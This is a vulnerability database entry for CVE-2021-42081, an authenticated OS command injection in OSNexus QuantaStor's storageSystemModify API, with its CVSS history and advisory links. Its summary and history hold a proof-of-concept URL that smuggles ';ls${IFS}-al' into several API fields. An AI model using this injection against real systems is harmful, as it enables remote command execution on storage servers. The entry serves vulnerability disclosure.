CVE-2021-42081

An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al
Configurations

Configuration 1 (hide)

cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*

History

22 Sep 2025, 07:15

Type Values Removed Values Added
Summary (en) An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. (en) An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al

21 Nov 2024, 06:27

Type Values Removed Values Added
CVSS v2 : unknown
v3 : 7.2
v2 : unknown
v3 : 9.1
References
  • () https://www.divd.nl/DIVD-2021-00020 -
References () https://csirt.divd.nl/CVE-2021-42081 - Third Party Advisory () https://csirt.divd.nl/CVE-2021-42081 - Third Party Advisory
References () https://www.osnexus.com/products/software-defined-storage - Product () https://www.osnexus.com/products/software-defined-storage - Product
References () https://www.wbsec.nl/osnexus - Third Party Advisory () https://www.wbsec.nl/osnexus - Third Party Advisory

16 Oct 2024, 12:15

Type Values Removed Values Added
References
  • {'url': 'https://www.divd.nl/DIVD-2021-00020', 'tags': ['Broken Link'], 'source': 'csirt@divd.nl'}
  • () https://csirt.divd.nl/DIVD-2021-00020/ -

Information

Published : 2023-07-10 16:15

Updated : 2025-09-22 07:15


NVD link : CVE-2021-42081

Mitre link : CVE-2021-42081

CVE.ORG link : CVE-2021-42081


JSON object : View

Products Affected

osnexus

  • quantastor
CWE
CWE-78

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')